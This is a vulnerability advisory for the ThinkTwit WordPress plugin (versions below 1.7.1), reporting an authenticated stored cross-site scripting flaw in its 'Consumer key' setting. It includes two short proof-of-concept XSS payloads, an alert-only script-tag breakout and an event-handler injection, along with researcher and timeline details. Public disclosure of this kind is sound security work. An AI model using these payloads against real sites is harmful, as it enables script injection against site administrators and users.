WordPress Plugin Vulnerabilities
ThinkTwit < 1.7.1 - Authenticated Stored Cross-Site Scripting (XSS)
Description
The plugin did not sanitise or escape its "Consumer key" setting before outputting it its settings page, leading to a Stored Cross-Site Scripting issue.
Proof of Concept
Put the following payload in the "Consumer key" setting of the plugin (/wp-admin/options-general.php?page=thinktwit): - v < 1.6.7 : "><script>alert(/XSS/)</script> - v < 1.7.1 : " style=animation-name:rotation onanimationstart=alert(/XSS/)//
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Vinit Yashwantrao
Submitter
Vinit Yashwantrao
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-18 (about 2 years ago)
Added
2021-08-18 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)